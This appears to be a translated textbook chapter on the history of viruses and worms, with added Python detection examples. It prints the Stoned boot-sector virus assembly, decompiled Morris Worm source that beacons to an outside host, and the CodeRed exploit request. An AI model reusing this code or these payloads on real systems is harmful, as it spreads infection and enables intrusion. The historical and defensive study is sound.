000000AC A14C00 mov ax,[13h * 4 + 0] ; Interrupt Vector 13h Offset
000000AF A3097C mov [Int_13h_Offset],ax
000000B2 A14E00 mov ax,[13h * 4 + 2] ; Interrupt Vector 13h Segment
000000B5 A30B7C mov [Int_13h_Segment],ax
; allocate 2048 bytes memory from the end of real mode memory
000000B8 A11304 mov ax,[0x413] ; MEM 0040h:0013h - BASE MEMORY SIZE IN KBYTES
000000BB 48 dec ax
000000BC 48 dec ax
000000BD A31304 mov [0x413],ax
; * 1024 / 16 = Segment Size
000000C0 B106 mov cl,6 ; 6 bits left shift = * 64
000000C2 D3E0 shl ax,cl
000000C4 8EC0 mov es,ax
000000C6 A30F7C mov [7C00h + Relocated_Memory_Segment],ax ; store segment of relocated memory for
;later usage
; set new Interrupt 13h handler
000000C9 B81500 mov ax,Interrupt_13h
000000CC A34C00 mov [13h * 4 + 0],ax ; Offset
000000CF 8C064E00 mov [13h * 4 + 2],es ; Segment
; now relocate this code to new allocated memory, where int 13h points to
000000D3 B9B801 mov cx,440 ; 440 bytes to copy (everything up to the Partition Table)
000000D6 0E push cs
000000D7 1F pop ds ; from ds:si (code segment:0)
000000D8 33F6 xor si,si
000000DA 8BFE mov di,si ; to es:di (allocated memory:0)
000000DC FC cld
000000DD F3A4 rep movsb ; rep movsd
000000DF 2EFF2E0D00 jmp word far [cs:Relocated_Memory_Offset] ; why not?
Relocated_Memory:
; execute Reset Disk System
000000E4 B80000 mov ax,0
000000E7 CD13 int 13h
; set register for reading the bootloader
000000E9 33C0 xor ax,ax
000000EB 8EC0 mov es,ax ; target segment = 0000h
000000ED B80102 mov ax,0x201 ; function Read Sectors, 1 sector
000000F0 BB007C mov bx,0x7C00 ; data buffer = 0000h:7C00h
; check if hard disk has already been infected
000000F3 2E803E080000 cmp [cs:Hard_Disk_Infected],byte 0
000000F9 740B jz Attack_Floppy_Hard_Disk
; read original bootloader from hard disk and execute it
; if already infected, sector 7 contains the backup, so load & execute
000000FB B90700 mov cx,7 ; sector 7, backup copy
000000FE BA8000 mov dx,80h ; first hard disk
00000101 CD13 int 13h
00000103 EB49 jmp short Stoned_Exit
00000105 90 nop
Attack_Floppy_Hard_Disk:
; - Floppy (first drive) <- will be started later
; - Hard Disk (first drive)
; load the original bootloader from the first floppy drive to 7C00h, will be executed later
00000106 B90300 mov cx,3 ; sector 3
00000109 BA0001 mov dx,0100h ; first floppy, head 1
0000010C CD13 int 13h
0000010E 723E jc Stoned_Exit ; if error, execute original bootloader
; display the message only if multiple of 440 ms time delay
00000110 26F6066C0407 test byte [es:046Ch],00000111b ; 0000h:046Ch = Timer ticks since midnight (updated
; every 55 milliseconds by BIOS)
00000116 7512 jnz Message_Output_Finished
; lets output "Your PC is now Stoned!"
00000118 BE8901 mov si,Stoned_Message
0000011B 0E push cs
0000011C 1F pop ds ; ds:si = message
Message_Output_loop:
0000011D AC lodsb ; next character
0000011E 0AC0 or al,al ; zero?
00000120 7408 jz Message_Output_Finished
00000122 B40E mov ah,0Eh ; function teletype output
00000124 B700 mov bh,0 ; on first page
00000126 CD10 int 10h
00000128 EBF3 jmp short Message_Output_loop
Message_Output_Finished:
; read bootloader from hard disk
0000012A 0E push cs
0000012B 07 pop es
0000012C B80102 mov ax,0x201 ; function Read Sectors, 1 sector
0000012F BB0002 mov bx,0x200 ; to address cs:0200h
00000132 B101 mov cl,0x1 ; sector 1
00000134 BA8000 mov dx,0x80 ; hard disk
00000137 CD13 int 13h
00000139 7213 jc Stoned_Exit
; check whether the hard disk is already infected
0000013B 0E push cs
0000013C 1F pop ds
0000013D BE0002 mov si,0200h ; source ds:si = cs:0200h (the read sector)
00000140 BF0000 mov di,0000h ; compare against this bootloader
00000143 AD lodsw ; 1st word to compare
00000144 3B05 cmp ax,[di]
00000146 7511 jnz Hard_Disk_Not_Infected
00000148 AD lodsw ; 2nd word to compare
00000149 3B4502 cmp ax,[di+0x2]
0000014C 750B jnz Hard_Disk_Not_Infected
Stoned_Exit:
; exit from Stoned, execute original bootloader
0000014E 2EC606080000 mov [cs:Hard_Disk_Infected],byte 0
00000154 2EFF2E1100 jmp word far [cs:Original_Bootloader_Offset] ; exit to original bootloader..
Hard_Disk_Not_Infected:
00000159 2EC606080002 mov [cs:Hard_Disk_Infected],byte 2 ; remember that hard disk has been infected (has
; no effect)
; write backup
0000015F B80103 mov ax,0x301 ; function write sectors, 1 sector
00000162 BB0002 mov bx,0x200 ; data buffer
00000165 B90700 mov cx,7 ; backup copy
00000168 BA8000 mov dx,0x80 ; hard disk
0000016B CD13 int 13h
0000016D 72DF jc Stoned_Exit
; copy Partition Table
0000016F 0E push cs
00000170 1F pop ds ; ds = cs
00000171 0E push cs
00000172 07 pop es ; es = cs
00000173 BEBE03 mov si,0x3BE ; source = read sector
00000176 BFBE01 mov di,0x1BE ; target = copy of this bootloader
00000179 B94202 mov cx,0x242 ; cl = 4 * 16 + 2 (4 Partition Table entries + Magic Number)
0000017C F3A4 rep movsb
; infect the hard disk
0000017E B80103 mov ax,0x301 ; function write sectors, 1 sector
00000181 33DB xor bx,bx
00000183 FEC1 inc cl
00000185 CD13 int 13h
00000187 EBC5 jmp short Stoned_Exit
; Stoned message (7 = BEL, 13 = CF, 10 = LF)
Stoned_Message db 7, "Your PC is now Stoned!", 7, 13, 10, 10, "LEGALISE MARIJUANA!"
times 512-($-$$) db 0
Figure (16): Code of the Stoned virus
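As an added example (not code from the original document), the following Python code checks a raw disk image for the relocation that paragraph 8 and the listing describe: the original boot sector is kept in a backup sector (side 0, cylinder 0, sector 7 of a hard disk, which is LBA 6; head 1, sector 3 of a 9-sector-per-track 360 kB floppy, which is LBA 11, the "sector 11" of the text) while the sector at LBA 0 carries the same partition table but different code. The eight-sector sample image, the placeholder byte strings and the function names are constructed; no virus code is reproduced.

```python
"""Check a raw disk image for a Stoned-style relocated boot sector and
restore it the way a cleaning tool would.  Added example, not code from the
original document; the sample image is constructed."""

SECTOR = 512
PART_TABLE = 0x1BE             # partition table offset in a boot sector (listing: 0x1BE)
BOOT_SIG = b"\x55\xAA"         # boot signature in the last two bytes
HARD_DISK_BACKUP_LBA = 6       # side 0, cylinder 0, sector 7 (1-based CHS) is LBA 6
FLOPPY_360K_BACKUP_LBA = 11    # head 1, sector 3 with 9 sectors per track is LBA 11
MESSAGE_FRAGMENT = b"Stoned!"  # text from the listing's Stoned_Message


def sector(image: bytes, lba: int) -> bytes:
    """Return the 512-byte sector at the given LBA (short if the image ends)."""
    return image[lba * SECTOR:(lba + 1) * SECTOR]


def analyze_boot_sector(image: bytes, backup_lba: int) -> dict:
    """Compare LBA 0 with the documented backup sector."""
    mbr, backup = sector(image, 0), sector(image, backup_lba)
    mbr_ok = len(mbr) == SECTOR and mbr[-2:] == BOOT_SIG
    backup_ok = len(backup) == SECTOR and backup[-2:] == BOOT_SIG
    same_table = mbr_ok and backup_ok and mbr[PART_TABLE:-2] == backup[PART_TABLE:-2]
    code_differs = mbr_ok and backup_ok and mbr[:PART_TABLE] != backup[:PART_TABLE]
    return {
        "mbr_signature_ok": mbr_ok,
        "message_in_mbr": MESSAGE_FRAGMENT in mbr,
        "backup_is_boot_sector": backup_ok,
        # A relocated original: a valid backup with the same partition table
        # but other code in front of it, exactly the layout paragraph 8 describes.
        "relocated_boot_sector": same_table and code_differs,
    }


def restore_boot_sector(image: bytes, backup_lba: int) -> bytes:
    """What a cleaning tool does: put the backed-up code back at LBA 0 while
    keeping the partition table that is currently in the MBR."""
    mbr, backup = sector(image, 0), sector(image, backup_lba)
    return backup[:PART_TABLE] + mbr[PART_TABLE:] + image[SECTOR:]


def build_sample_image(infected: bool) -> bytes:
    """Constructed eight-sector hard disk image.  Clean: original code at LBA 0.
    Infected layout (placeholder text, not virus code): loader text with the
    message at LBA 0 and the original sector moved to LBA 6."""
    entry = bytes([0x80, 1, 1, 0, 0x06, 0xFE, 0x3F, 0x0F, 0x3F, 0, 0, 0, 0xC1, 0xFF, 0x0F, 0])
    table = entry + bytes(48)  # one active FAT16 entry plus three empty slots

    def boot_sector(code: bytes) -> bytes:
        return code.ljust(PART_TABLE, b"\x00") + table + BOOT_SIG

    original = boot_sector(b"ORIGINAL-BOOT-CODE (placeholder, constructed)")
    empty = bytes(SECTOR)
    if not infected:
        return original + empty * 7
    loader = boot_sector(b"PLACEHOLDER-LOADER Your PC is now Stoned!")
    return loader + empty * 5 + original + empty


if __name__ == "__main__":
    for label, img in (("clean", build_sample_image(False)),
                       ("infected", build_sample_image(True))):
        print(label, analyze_boot_sector(img, HARD_DISK_BACKUP_LBA))
```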
The Jerusalem Virus
8. A file-infecting virus discovered in Israel in 1987. Its origin is uncertain; it is believed to have started in Israel, but evidence found in 1991 suggests it may have come from Italy. As of 1993 the Jerusalem virus was still spreading and a great many variants had been created. The Jerusalem virus infects both .exe and .com files and is more destructive than Stoned. Because it acts only on Friday the 13th, it spread much more slowly than Stoned, yet it destroyed users' programs by the tens of thousands. The virus does not destroy the COMMAND.COM file.
9. The Jerusalem virus works in two parts: a nuisance part and a destructive part. In the nuisance part, every half hour it draws a region from row 5, column 5 to row 16, column 16, creating black windows that disrupt the user. The destructive part runs on Friday the 13th and deletes any program executed on that day. Its variants include Suriv, Anarkia, Apocalypse, Captain Trip, Mendoza and Nemesis.
Morris Worm
9. The Morris Worm, also called the Internet Worm or the Great Worm, which spread in November 1988, can be regarded as the first worm, and it was also the first worm to draw major attention to network security and to weaknesses in UNIX-based operating systems. The worm infected Sun Microsystems' Sun 3 systems and VAX computers running 4BSD Unix. The attack came through a weakness in the Sendmail program used on UNIX systems. Although the Morris Worm was created at Cornell University, it was first released from MIT in order to conceal its origin.
10. The worm attacked through weaknesses in rsh, fingerd and sendmail on Solaris and BSD systems. When the worm learned that a new computer could be infected, it sent its files to that computer. In its initialization phase it takes several measures to avoid detection while running on the system. First, it sets its argument (argv[0]) to sh, the same process name as the Bourne shell. Since that is a common command shell on UNIX systems, a user who lists the running processes would not notice it. Likewise, the worm's core dump size is 0 bytes, so even if the worm crashes or is forced to crash, no trace of it can ever be found. The worm reads the current time and stores it for generating random numbers later.
11. To run completely, the worm tries to load its object files. The worm can be run with the -p command line argument, which is used to delete the files after they have been loaded. Later, while running in memory, it even deletes itself from the disk. The worm also tries to delete the /tmp/.dumb file, which it no longer needs. If it fails to load any of the object files, or cannot load the l1.c file it uses to infect other systems, the worm stops running. The worm clears the strings in its argument array to conceal its presence.
12. The worm checks the network interfaces together with their flags and addresses. If none is found, it stops running. It uses the network mask to discover the IP addresses in use on the local area network (LAN). It then kills the process given with -p. These actions are only the worm's initialization; once they are complete, it calls its main routine.
13. In its main phase, after infecting a system the worm runs a routine called Cracksome, which searches for host computers to infect next. Then it runs another routine, other_sleep, for 30 seconds. The worm runs Cracksome again, forks off two child processes and terminates the parent process. The child process contains everything the parent had, and has a new process ID that makes the worm harder to find. The worm then continues through the infected process. Next it runs other_sleep again for 120 seconds. The worm tries to send 1 byte to port 11357 of 128.32.137.13 (ernie.berkeley.edu); however, because it used a TCP command instead of UDP, the send never succeeded. If the worm has run for more than 12 hours, it clears some of its host addresses. The worm checks the pleasequit variable, and if it has used more than 10 passwords from its dictionary files, it stops running.
14. In the Cracksome routine, the Morris Worm searches for other systems to infect and tries to crack weak passwords. The worm reads the /etc/hosts.equiv file to obtain a list of computers to infect. It can also find a second list in /.rhosts for later infection. The worm reads the /etc/passwd file, which contains the list of users on the computer and their hashed passwords, and exploits that security weakness. It then uses /etc/passwd to locate users' personal .forward files, which forward mail to other computers and are used to learn the locations of further computers to attack.

15. The other_sleep function tries to find other worms on the computer system. The worm has only a 1 in 7 chance of performing this action; the first run lasts 30 seconds and the second 120 seconds. The operation of the Morris Worm and part of its code can be seen in detail in Figure (17).
#include "worm.h"
#include <stdio.h>
#include <signal.h>
#include <strings.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/fcntl.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>
extern errno;
extern char *malloc();
int pleasequit; /* See worm.h */
int nobjects = 0;
int nextw;
char *null_auth;
object objects[69]; /* Don't know how many... */
object *getobjectbyname();
char *XS();
main(argc, argv) /* 0x20a0 */
int argc;
char **argv;
{
int i, l8, pid_arg, j, cur_arg, unused;
long key; /* -28(fp) */
struct rlimit rl;
l8 = 0; /* Unused */
strcpy(argv[0], XS("sh")); /* <env+52> */
time(&key);
srandom(key);
rl.rlim_cur = 0;
rl.rlim_max = 0;
if (setrlimit(RLIMIT_CORE, &rl))
;
signal(SIGPIPE, SIG_IGN);
pid_arg = 0;
cur_arg = 1;
if (argc > 2 &&
strcmp(argv[cur_arg], XS("-p")) == 0) { /* env55 == "-p" */
pid_arg = atoi(argv[2]);
cur_arg += 2;
}
for(i = cur_arg; i < argc; i++) { /* otherwise <main+286> */
if (loadobject(argv[i]) == 0)
exit(1);
if (pid_arg)
unlink(argv[i]);
}
if ((nobjects < 1) || (getobjectbyname(XS("l1.c")) == NULL))
exit(1);
if (pid_arg) {
for(i = 0; i < 32; i++)
close(i);
unlink(argv[0]);
unlink(XS("sh")); /* <env+63> */
unlink(XS("/tmp/.dumb")); /* <env+66>"/tmp/.dumb" */
}
for (i = 1; i < argc; i++)
for (j = 0; argv[i][j]; j++)
argv[i][j] = '\0';
if (if_init() == 0)
exit(1);
if (pid_arg) { /* main+600 */
if (pid_arg == getpgrp(getpid()))
setpgrp(getpid(), getpid());
kill(pid_arg, 9);
}
mainloop();
}
static mainloop() /* 0x2302 */
{
long key, time1, time0;
time(&key);
srandom(key);
time0 = key;
if (hg() == 0 && hl() == 0)
ha();
checkother();
report_breakin();
cracksome();
other_sleep(30);
while (1) {
/* Crack some passwords */
cracksome();
/* Change my process id */
if (fork() > 0)
exit(0);
if (hg() == 0 && hi() == 0 && ha() == 0)
hl();
other_sleep(120);
time(&time1);
if (time1 - time0 >= 60*60*12)
h_clean();
if (pleasequit && nextw > 0)
exit(0);
}
}
static trans_cnt;
static char trans_buf[NCARGS];
char *XS(str1) /* 0x23fc */
char *str1;
{
int i, len;
char *newstr;
#ifndef ENCYPHERED_STRINGS
return str1;
#else
len = strlen(str1);
if (len + 1 > NCARGS - trans_cnt)
trans_cnt = 0;
newstr = &trans_buf[trans_cnt];
trans_cnt += 1 + len;
for (i = 0; str1[i]; i++)
newstr[i] = str1[i]^0x81;
newstr[i] = '\0';
return newstr;
#endif
}
/* This report a sucessful breakin by sending a single byte to "128.32.137.13"
* (whoever that is). */
static report_breakin(arg1, arg2) /* 0x2494 */
{
int s;
struct sockaddr_in sin;
char msg;
if (7 != random() % 15)
return;
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = REPORT_PORT;
sin.sin_addr.s_addr = inet_addr(XS("128.32.137.13"));
/* <env+77>"128.32.137.13" */
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
return;
if (sendto(s, &msg, 1, 0, &sin, sizeof(sin)))
;
close(s);
}

Figure (17): Code of the Morris Worm
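The XS() routine in the listing stores every string XORed with 0x81, so a plain `strings` pass over the binary shows nothing useful. The following added example, which is not the worm's code, reproduces that encoding in Python and shows how an analyst recovers such strings from a byte blob; the blob and the list of hidden strings are constructed from the names that appear in the listing above.

```python
XS_KEY = 0x81   # the constant in the worm's XS(): newstr[i] = str1[i] ^ 0x81


def xs_encode(plain: str) -> bytes:
    """Stored (obfuscated) form of a string, as it sat in the worm's binary."""
    return bytes(b ^ XS_KEY for b in plain.encode("ascii"))


def xs_decode(stored: bytes) -> str:
    """What XS() does at run time; XOR with a constant is its own inverse."""
    return bytes(b ^ XS_KEY for b in stored).decode("ascii")


def extract_xs_strings(blob: bytes, min_len: int = 2) -> list:
    """Recover XOR-0x81 strings from a byte blob the way an analyst would when `strings`
    shows nothing: keep runs whose bytes turn printable after the XOR and split at anything
    else. The NUL terminator XS() stops at becomes 0x81 after the XOR, so it always ends a run,
    and ordinary ASCII text turns into bytes >= 0x80, so it is never reported."""
    found, run = [], bytearray()
    for b in blob:
        c = b ^ XS_KEY
        if 0x20 <= c < 0x7F:
            run.append(c)
        else:
            if len(run) >= min_len:
                found.append(run.decode("ascii"))
            run = bytearray()
    if len(run) >= min_len:
        found.append(run.decode("ascii"))
    return found


# Constructed blob: the strings main() and report_breakin() pass to XS() in the listing,
# each stored XOR 0x81 and NUL-terminated, with some plain text in front to show it is skipped.
HIDDEN = ["sh", "-p", "l1.c", "/tmp/.dumb", "128.32.137.13"]
SAMPLE_BLOB = (b"plain text\x00"
               + b"".join(xs_encode(s) + b"\x00" for s in HIDDEN)
               + b"\x00\x00")

if __name__ == "__main__":
    print(xs_encode("sh").hex())          # how "sh" looks in the binary
    print(extract_xs_strings(SAMPLE_BLOB))
```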


The Concept Virus
16. The Concept, which appeared in 1995, is a polymorphic virus and the first virus to infect Microsoft Word. W97M/Concept is also called Word Prank Macro or WW6Macro, and the virus was written in the Microsoft Word v6.0 macro language. WM/Concept spread extremely widely between 1995 and 1997 and has now almost disappeared.
17. Concept contains several Word macros. Because Word macros are carried and distributed along with Word documents, the virus can spread through document files. What makes matters worse is that Concept runs on Microsoft Word for Windows 6.x and 7.x, Word for Macintosh 6.0, and Windows 95 and Windows 98 systems. Concept was the first virus to run on different operating systems; its target was not Windows or MacOS but Microsoft Word itself.
18. The virus runs every time an infected document file is opened. It tries to infect NORMAL.DOT, Word's global document template. If the virus finds the PayLoad and FileSaveAs macros in the template, it assumes the template is already infected and stops. If PayLoad and FileSaveAs are not found in NORMAL.DOT, it copies the virus macros into NORMAL.DOT and displays a small dialog box on the screen. The dialog box contains the number "1" and an OK button. This dialog is shown only when NORMAL.DOT is infected for the first time.
19. After arranging to infect the global template, the virus infects every document file saved with the Save As command. If an infected document is opened on another computer that does not have the virus, the virus infects that computer's global document template. The virus contains the macros AAAZAO, AAAZFS, AutoOpen, FileSaveAs and PayLoad. Note that AutoOpen and FileSaveAs are legitimate macro names, and some people already use macros of those names in their documents and templates. The PayLoad macro is never executed. Variants of Concept include Concept.G, Concept.F and Concept.BZ.
Melissa Worm
20. Melissa, first discovered on 26 March 1999, was the first combination of a Word macro virus and a worm, and works with Microsoft Word 97, Microsoft Word 2000 and the Microsoft Outlook 97 or 98 e-mail clients. It does not work in Word 95. You do not need Microsoft Outlook to receive the virus, but without Outlook it cannot spread to other computers. Melissa can infect Windows 95/98/NT and Macintosh computers. Even if the infected computer has neither Outlook nor Internet access, the virus keeps spreading among the document files on the system.
21. The virus uses the addresses in Microsoft Outlook and Outlook Express to mail itself to other users. Each time it infects a computer, it tries to infect 50 more people from the Outlook address book. The worm spreads quickly because simply opening the message is enough for the recipient to pass the infection on. Melissa can be classified as a virus as well as a worm. Melissa does not destroy any data on the hard drive and does not damage the computer; it only affects the Microsoft Word settings. Melissa arrives as an e-mail attachment. The subject of the e-mail begins with "Important Message from", followed by the name of the sender's e-mail account. The body of the e-mail says "Here's the document you asked for... Don't show anyone else", and opening the attached Word document infects the computer.
22. Melissa originated in alt.sex, one of the open discussion groups on the Internet. The virus was posted inside a file named LIST.DOC, which contained passwords for pornographic websites. Users downloaded the file and opened it in Microsoft Word. When opened, it sent LIST.DOC to 50 e-mail users found in their e-mail alias file (address book). Note that Melissa is now no longer confined to LIST.DOC but can be found in any document file. It attacked by taking advantage of human nature: people want to open any document sent by someone they know.
 
23. The virus activates when the day of the month coincides with the minute of the hour (for example, on the 27th day of the month at 18:27), and at that moment it inserts the text "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here" into the currently open Word file.
Loveletter Worm
24. At a time when social networks were becoming popular, tricking a person into opening a file or disclosing information was seen with the Loveletter Worm on 4 May 2000. The worm can spread through Microsoft Outlook as well as through the mIRC client. The beginning of the virus code contains the text "barok -loveletter(vbe) by spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila, Philippines".

Figure (17): The ILOVEYOU virus sent as an e-mail attachment
25. When the worm runs, it first copies the files MSKernel32.vbs and LOVE-LETTER-FOR-YOU.TXT.vbs into the Windows system directory (C:\Windows\System). It copies the file Win32DLL.vbs into the Windows directory (C:\Windows). The worm then replaces the Internet Explorer home page with a link pointing to the location of the WIN-BUGSFIX.exe file.
26. The worm downloads a password-stealing Trojan from the Internet. At system startup the Trojan looks for a hidden window named "BAROK..", and if one exists, the Trojan does nothing and exits immediately. If not, the Trojan checks the WinFAT32 subkey under "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run". If the WinFAT32 subkey is not found, the Trojan creates that key, copies itself into the \Windows\System\ directory as WINFAT32.exe, and runs from there. The Trojan then changes the Internet Explorer home page to "about:blank". After that, the Trojan deletes the following keys:
(a) Software\Microsoft\Windows\CurrentVersion\Policies\Network\HideSharePwds
(b) Software\Microsoft\Windows\CurrentVersion\Policies\Network\DisablePwdCaching
(c) .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network\HideSharePwds
(d) .DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network\DisablePwdCaching
27. The Trojan loads the MPR.DLL file and calls the WNetEnumCachedPasswords function, then sends the stolen RAS passwords and the cached Windows passwords to the Trojan author's e-mail address, mailme@super.net. It uses the mail server smtp.super.net.ph to send the e-mails. The subject of the e-mail is "Barok... email.passwords.sender.trojan" and the body contains the text "barok... i hate go to school suck -> by:spyder @Copyright (c) 2000 GRAMMERSoft Group> Manila,Phils".
28. LoveLetter sends only one mail to each recipient. After a mail has been sent, it records this in the registry and does not keep sending mails in bulk. The virus then searches folders for the file types it wants and replaces them with its own code. The extensions of the replaced files may be .vbs or .vbe. For files ending in .js, .jse, .css, .wsh, .sct and .hta, the virus creates new files under the original name; the only difference is that the new file's extension is .vbs. The original file is deleted. After that, the virus searches for .jpg and .jpeg image files, creates new files and deletes the originals. Then the virus searches for .mp3 and .mp2 music files, creates new files and hides the originals. In both cases the newly created files keep the original file name with an additional .vbs extension (for example, pic.jpg.vbs instead of pic.jpg).
29. This malware spread to more than 45 million computers and affected stock markets, food companies, media and car companies, huge technology companies, and government agencies, universities and medical schools around the world. Ford Motor Company had to shut down its e-mail system, and General Motors, although not directly hit by the worm, could no longer use the company's Outlook. The worm launched a Denial-of-Service (DoS) attack against the White House website. About 40 GB of JPEG images were lost to the worm, and the damage it caused was roughly between 8.75 billion and 10 billion dollars. The worm program was written by Onel A. de Guzman, a student at AMA Computer University in Makati, Philippines, and the worm was first found in Hong Kong.
The Anna Kournikova Virus
30. The Kournikova virus is a Visual Basic Script worm. It is also called OnTheFly. It was created with a worm construction kit. This worm stood out because virus and worm construction kits rarely produced working code. The reason for its fame was probably its use of social engineering: using a picture of the famous tennis player Anna Kournikova, it lured the victim into running the worm.
31. OnTheFly arrives as an e-mail attachment with the subject "Here you have, ;o)". The body reads "Hi: Check This!". The attachment is a 2,853-byte .vbs file named AnnaKournikova.jpg.vbs, which entices the recipient to open it in the expectation of seeing a photo of the tennis player.
32. When run, the virus creates \Software\OnTheFly\mailed under the current user registry key. To determine whether it has already mailed itself, the worm checks the registry for the value "1". If the value is not "1", it mails itself to every e-mail address in the Outlook address book and then sets the value "1" in the registry. Once mailing is finished, the worm continues running. If the date is 26 January, OnTheFly tries to open http://www.dynabyte.nl, a website in the Netherlands. Although OnTheFly did no deliberate damage, it filled mailboxes and consumed resources. Millions of computers were infected, and the losses caused by the worm amounted to 166,827 dollars.
33. The worm's creator was Jan De Wit, a 20-year-old computer shop worker and student from the Netherlands, and De Wit did not actually know how to write a computer program. He used the VBS Virus Generator toolkit. The official name of the worm is OnTheFly, but the media used only the name Anna Kournikova.
CodeRed
34. CodeRed is a worm that caused billions of dollars in losses in 2001. It contains the text "Hacked by Chinese" and displays it on the web pages it attacks by defacement (Figure 18). It is one of the few worms that run only in memory, leaving no file on the hard drive or on any other storage device.

Figure (18): A defaced web page
35. CodeRed arrives at the server on TCP port 80 as a GET /default.ida request; the request carries code that exploits a weakness in Microsoft's Internet Information Server (IIS) and causes the worm's code to run inside the IIS server. It runs entirely in memory and cannot be found on disk (Figure 19). Its code is 3569 bytes long.
GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNN NNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u5
3ff%u0078%u0000%u00=a HTTP/1.0

Figure (19): CodeRed's signature
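The request shape in Figure (19), a GET for /default.ida whose query is a long run of one filler byte followed by %uXXXX escapes, is easy to recognise in web server logs. The following added example (not from the page) runs such a check over constructed log lines; it goes slightly beyond the page by accepting any repeated filler byte rather than only the 'N' shown, and the log layout (date time client-ip method url status) is this example's own.

```python
import re

# GET /default.ida?<run of one repeated byte><tail>; the %u escapes are looked for in the tail.
CODERED_RE = re.compile(
    r"GET\s+/default\.ida\?(?P<filler>(?P<ch>.)(?P=ch){49,})(?P<tail>\S*)"
)
U_ESCAPE_RE = re.compile(r"%u[0-9a-fA-F]{4}")


def classify_request(line: str):
    """Return match details for a CodeRed-style request in one log line, or None."""
    m = CODERED_RE.search(line)
    if m is None:
        return None
    escapes = U_ESCAPE_RE.findall(m.group("tail"))
    return {
        "filler_char": m.group("ch"),
        "filler_len": len(m.group("filler")),
        "u_escapes": len(escapes),
        # a bare long filler might be a scanner probe; the %u-encoded tail is what marks CodeRed
        "code_red": len(escapes) >= 4,
    }


def client_ip(line: str) -> str:
    # constructed log layout used below: date time client-ip method url status
    return line.split()[2]


def scan_log(text: str) -> list:
    """Run classify_request over every line; return (line_no, client_ip, details) for hits."""
    hits = []
    for n, line in enumerate(text.strip().splitlines(), start=1):
        details = classify_request(line)
        if details and details["code_red"]:
            hits.append((n, client_ip(line), details))
    return hits


# Constructed sample log; the payload string is the one shown in Figure (19).
FILLER = "N" * 224
SHORT_FILLER = "N" * 80
PAYLOAD = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
           "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")
SAMPLE_LOG = f"""
2001-07-19 10:12:01 192.0.2.9 GET /index.html 200
2001-07-19 10:12:05 192.0.2.23 GET /default.ida?{FILLER}{PAYLOAD} 200
2001-07-19 10:12:09 192.0.2.9 GET /default.ida?foo=bar 404
2001-07-19 10:12:11 192.0.2.31 GET /default.ida?{SHORT_FILLER} 400
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```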

36. Using the CreateThread API, the worm tries to spawn one hundred copies of itself as threads. Because of a bug in its code, however, it can actually create more than that, which drives the CPU usage of an infected computer high. Every thread checks for C:\Notworm, and if that file exists the worm stops working and goes into an infinite sleep. Nobody knows exactly what the Notworm file looks like; some speculate that it exists only on the worm author's computer, to protect that machine from infection.
37. If the date is between the 20th and 28th of the month, the worm sends junk data to port 80 of 198.137.240.91. It then also sends to the White House's Internet Protocol (IP) address. (The White House had to change its IP address because of this worm.) After the 28th, the worm enters an infinite sleep and does not wake from it unless deliberately restarted. The 100th thread checks the language used by the server's web page, and if it is US English it defaces the page. Before the 20th of the month, the other 99 threads target random IP addresses and try to attack those computers. To avoid re-infecting the current computer over and over, it makes no HTTP requests to 127.*.*.* addresses. Since CodeRed entered its infinite sleep on 28 July 2001, its spread has stopped. It is believed that unless it is deliberately reactivated, the worm will not wake up and spread again.
Chapter (5)
Domestic Viruses
Introduction
1. Although viruses of every kind written and released abroad spread into the country, up to early 2008 no virus written by a local programmer was found to have spread widely, apart from small programs written as practice. What differs from other countries is that only a minority pursue programming locally, and most authors of domestic viruses turn out to be developers. After 2008, some viruses written with destructive intent appeared. One advantage is that, because local virus writers are still weak in programming, copy code found online, and do not yet understand well how viruses work and behave, no complex or advanced viruses have appeared, such as file infectors that inject code into files, polymorphic viruses or metamorphic viruses. Consequently, locally created viruses could be dealt with competently by local experts themselves. Looking at most of these viruses, only the same characteristics are seen: being written in scripting languages, copying files somewhere, hiding files, running as more than one process, and modifying registry settings.
Magway FC Virus
2. It spread in 2010 and is written in the AutoIT scripting language. So that Windows logon does not proceed with the genuine explorer.exe but with an explorer.exe renamed from the MGY.exe file, it copies MGY.exe into the Windows directory (C:\Windows). MGY.exe is in fact nothing more than the explorer.exe file of Windows XP SP1 with its icon and the strings "Winner of MNL Challenge Cup 2009" and "Magway FC" modified. This is why "Magway FC" appears in place of "start" on the Start Menu (Figure 20).
3. The virus copies the files smss.exe, csrss.exe, lsass.exe, icserv.exe and autorun.inf into the directory C:\Windows\System32\{271287-000021-100287-705016}. While the virus is running, merely launching msconfig.exe (System Configuration Utility) or rstrui.exe (System Restore Service) shuts the computer down. It then terminates the running processes winsystem.exe, handydriver.exe, kerneldrive.exe, Wscript.exe, cmd.exe, nod32krn.exe and nod32kui.exe. Therefore, if a user tries to fight the virus with VB Script (.vbs) or batch (.bat) files, it immediately kills Wscript.exe and cmd.exe. Because the virus closes the Command Prompt as soon as it opens, the Command Prompt can only be used after renaming cmd.exe in the C:\Windows\System32 directory to cmd2.exe.
Figure (20): A Windows XP system infected by the Magway FC virus
